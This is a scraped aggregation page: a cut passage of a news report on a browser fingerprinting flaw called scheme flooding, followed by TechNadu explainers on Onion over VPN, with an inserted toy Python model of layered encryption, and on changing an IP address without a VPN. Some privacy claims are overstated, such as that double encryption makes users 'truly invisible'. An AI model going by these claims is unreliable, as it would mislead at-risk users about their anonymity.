"A combination of CORS policies and browser window features can be used to bypass [the safety mechanisms]," Darutkin said.

Of the four major browsers impacted, only Chrome developers appear to be aware of the scheme flooding vulnerability. The issue has been discussed on the Chromium bug-tracker and is planned to be fixed soon. Additionally, only the Chrome browser had any form of scheme flood protection which presented a challenge to bypass.

The Register also successfully tested the technique on Brave, Yandex Browser and Microsoft Edge.

"Getting a unique array of bits associated with a visitor's identity is not only possible, but can be used on malicious websites in practice," Darutkin noted, though he says that they did a quick search of the web and didn't find any website actively exploiting the vulnerability.

Still, the researchers' write-up could push some to use the scheme to track users online.

The team has submitted bug reports to Apple, Google and Mozilla, and hopes this vulnerability can be fixed soon. Let's hope that other browser creators will follow suit.


What Is Onion Over VPN? – TechNadu

Posted: at 4:49 am

The primary purpose of VPN services is to safeguard your digital privacy. They do that via a number of different VPN protocols, but they also use supplemental technologies for added privacy. That's precisely the case with Onion over VPN, which is a set of technologies created for the most cautious of VPN users. So, let's see what is Onion over VPN, what it can do, and how to safely use it.

Onion (also known as Tor) is a network of relays/servers designed to disguise your identity by encrypting your Web traffic. Therefore, it's quite similar to VPN services.

However, make no mistake. Onion and VPNs present two very different sets of technologies. What makes them similar is their end goal, and that would be your digital privacy. There are many differences between the two, and those differences span across the methodologies used to conceal your Internet traffic.

Routing your traffic through Onion relays is free of charge, so anyone can do that. The only requirement is to use the Tor browser (also available for free). The role of that Web browser is to prevent your device from communicating with Web servers directly. Instead, the Tor browser routes your traffic through a series of relays across the world, concealing your IP address, your physical location, and any other information that might be used to identify you online.

As its name implies, by using Onion over VPN, you employ two sets of technologies to obfuscate your Web traffic. Therefore, you get an additional layer of privacy protection.

The best way to describe how Onion over VPN works would be to describe its typical flow of data. So, heres what happens if you use a VPN that supports this technology natively:

What happens, in the end, depends on the type of websites you visit. For example, Onion websites (typically linked with the Dark Web) will decrypt your data upon arriving at its destination. And when it comes to regular websites, your data will be decrypted at a Tor exit node and forwarded to the website.

Since you're using double encryption with Onion over VPN, you practically eliminate any chances of anyone discovering your online whereabouts.
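To make the data flow above concrete, here is a toy model of the Onion over VPN chain that records what each hop can see: the VPN server sees the client's address but only an encrypted onion, each Tor relay sees only the previous and next hop, and the request itself becomes readable only at the exit relay (regular site) or at the destination (onion site). This is an added example, not TechNadu's or any VPN provider's code; the XOR stream cipher, shared keys and RFC 5737 documentation addresses are constructed for the demo and are not secure, and real Tor uses AES with per-hop key exchanges.

```python
"""Toy model of the Onion over VPN data flow described above: what each hop
can see.  Added example, not TechNadu's or any VPN's code.  The XOR stream
cipher, keys and addresses (RFC 5737 documentation ranges) are constructed
for the demo and are not secure; real Tor uses AES and per-hop handshakes."""
import hashlib
import json

CLIENT_IP = "203.0.113.10"
ADDR = {"vpn": "198.51.100.5", "guard": "192.0.2.11",
        "middle": "192.0.2.22", "exit": "192.0.2.33"}
# One shared key per hop (assumed to be established out of band in this toy)
KEYS = {n: hashlib.sha256(n.encode()).digest()
        for n in ["vpn", "guard", "middle", "exit", "service"]}
REQUEST = b"GET /inbox HTTP/1.1\r\nHost: example.com\r\n\r\n"  # constructed


def xor_stream(key, data):
    """Symmetric toy cipher: SHA-256 in counter mode XORed over the data."""
    out = bytearray()
    for i in range(0, len(data), 32):
        block = hashlib.sha256(key + i.to_bytes(4, "big")).digest()
        out += bytes(a ^ b for a, b in zip(data[i:i + 32], block))
    return bytes(out)


def wrap(key, next_hop, inner):
    """Add one layer: only the holder of `key` learns the next hop and inner bytes."""
    return xor_stream(key, json.dumps({"next": next_hop, "inner": inner.hex()}).encode())


def unwrap(key, cell):
    obj = json.loads(xor_stream(key, cell))
    return obj["next"], bytes.fromhex(obj["inner"])


def send(request, dest, onion_service=False):
    """Build the layered cell, walk it hop by hop and record each hop's view."""
    inner = xor_stream(KEYS["service"], request) if onion_service else request
    cell = wrap(KEYS["exit"], dest, inner)        # innermost Tor layer
    cell = wrap(KEYS["middle"], "exit", cell)
    cell = wrap(KEYS["guard"], "middle", cell)
    cell = wrap(KEYS["vpn"], "guard", cell)       # VPN tunnel around the whole onion
    views, prev = [], CLIENT_IP
    for hop in ["vpn", "guard", "middle", "exit"]:
        nxt, cell = unwrap(KEYS[hop], cell)
        views.append({"hop": hop, "from": prev, "next": nxt,
                      "reads_request": cell == request})
        prev = ADDR[hop]
    if onion_service:  # simplified: the service peels the final layer itself
        cell = xor_stream(KEYS["service"], cell)
    views.append({"hop": dest, "from": prev, "next": None,
                  "reads_request": cell == request})
    return views
```

Walking `send(REQUEST, "example.com")` shows the guard seeing the VPN server's address rather than the client's, and only the exit and the site reading the request; with `onion_service=True` the exit no longer reads it either.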


You should use Onion over VPN if you're very serious about maintaining your online privacy. In practice, this technology is often used by journalists, political activists, and similar.

As you can see, we're talking about a very complex combination of technologies here. However, that doesn't mean that average home users shouldn't rely on it. Still, you need to be aware of the drawbacks and limitations that will surface as soon as you connect to an Onion over VPN server.

The biggest drawback will be the impact of this Web flow setup on your Internet connection speed. Since your data will be encrypted twice, you will experience significant slowdowns.

With that said, Onion over VPN is useful for low-bandwidth activities, such as Web browsing, sending and receiving emails, and uploading/downloading a limited amount of data. You won't get to use it to stream online media or download gigabytes of data in one go.

In theory, yes. However, keep in mind that when it comes to Onion over VPN, we are talking about different types of setups. Here's what that means exactly.

No matter which VPN you pick (check out the best VPNs), that VPN will encrypt your Web data as soon as you connect to one of its servers. Then, you can launch the Tor browser to encrypt your data once again. Therefore, this is a manual way to achieve an Onion over VPN type of Web data flow.

Then, some VPNs support this technology natively. They offer servers that are already optimized to encrypt your Web data twice (first using their own server and then using the Tor network). In other words, those VPNs do it all for you without involving the Tor browser.

Not many VPNs offer the Onion over VPN functionality natively, as you can always use a Tor browser independently. However, when it comes to those that do, you can choose from NordVPN and ProtonVPN.

If you want to reach the highest level of online privacy, it doesn't really matter if you choose Onion over VPN or a double VPN connection. Here's why.

When it comes to Onion over VPN, you employ a single VPN server and a network of Tor relays (there are usually up to three nodes in use, but you'll always have a single exit node). So, you get double encryption, and we're talking about two different, incredibly secure layers of encryption here.

When it comes to double VPN connections, you employ two VPN servers. In other words, your Web traffic will be encrypted twice, adding a whole new layer of privacy. Even using a single VPN server should keep you hidden from anyone, so employing two servers should make you truly invisible on the Web.

With that said, those two technologies are equally capable. No matter which one you pick, you can rest assured that your privacy stays intact.

So, do you plan to use Onion over VPN, and in what way? Let us know via the comments section below. And lastly, thanks for reading!


How to Change IP Address Without VPN – TechNadu

Posted: at 4:49 am

A VPN is the quickest and most reliable way of changing your IP address without any security concerns. Still, some of you may want to know how to change your IP address without using a VPN, whether it's because you only need a temporary solution or a VPN subscription just isn't in the budget.

Now, there are a few different ways you can go about changing your IP without a VPN. Here they are, in no particular order.

Much like a VPN, a proxy masks your true IP address and assigns you a new one based on the particular server you connect to. They differ from VPNs in that proxies don't encrypt your data, leaving you exposed to data collection, hackers, and other online dangers.

On top of that, proxies typically have no control over DNS traffic. This means your DNS requests still broadcast your real IP address to the DNS provider. A good VPN provider typically uses their own DNS servers and integrates leak protection to prevent that from happening.

Anyway, back to proxies. The one advantage of a proxy is that you don't need to set anything up on your device. This makes them useful if you only want to access a few websites in particular. Here's an example using the Hide.me proxy service.

Follow the instructions on the website. Enter the website you want to access anonymously, choose a location from the drop-down list, and voilà.

Now, free proxies typically have a limited number of locations. Paid ones net you more options, but if you're looking for a wide server network, we really recommend checking out the top 10 VPNs with the most servers instead.

Using the Tor browser allows you to access a worldwide network of volunteer-run nodes (or relays). Think of it as using a series of interlinked proxies to connect to the Internet. Now, any online service you access can only see the IP address of the last node in the chain, keeping yours hidden.

Unfortunately, you have no control over which relays Tor decides to use at any given time. Moreover, the chain of nodes changes every time you visit a website. That being said, this process offers a great degree of online anonymity. If that's why you want to change your IP address without a VPN, then it's a decent (and free!) solution.

Keep in mind that routing your traffic through so many relays will negatively impact your browsing speeds. This makes Tor a poor option for streaming and other network-intensive activities. Light browsing is perfectly fine, however.

Simply hopping onto a different network than the one you're currently using will provide you with a new IP address. For example, switching to mobile data on your smartphone or using public Wi-Fi instead of your home network.

Obviously, this isn't an ideal solution, and using public Wi-Fi can be dangerous in itself. You can use it to get around an unfair IP block in a pinch, though.

If your ISP uses dynamic IP addresses (DHCP), unplugging your modem for a few hours will assign your IP to another user on their network. When you plug the modem back in, theres a chance you will gain a new IP address.

We say a chance because there's no guarantee of success. If you really need to change your IP address without a VPN and the methods above aren't effective, you might as well ask your ISP to do it themselves.

A majority of ISPs nowadays dynamically assign IP addresses to home users, so the modem method should work in most cases. If not, then give your ISP a call and explain why you want to change your IP address. You'll need a decent reason for it, though (getting banned on 4chan probably isn't going to cut it).

In the end, using a decent VPN (such as ExpressVPN) to change your IP address is still your best bet.
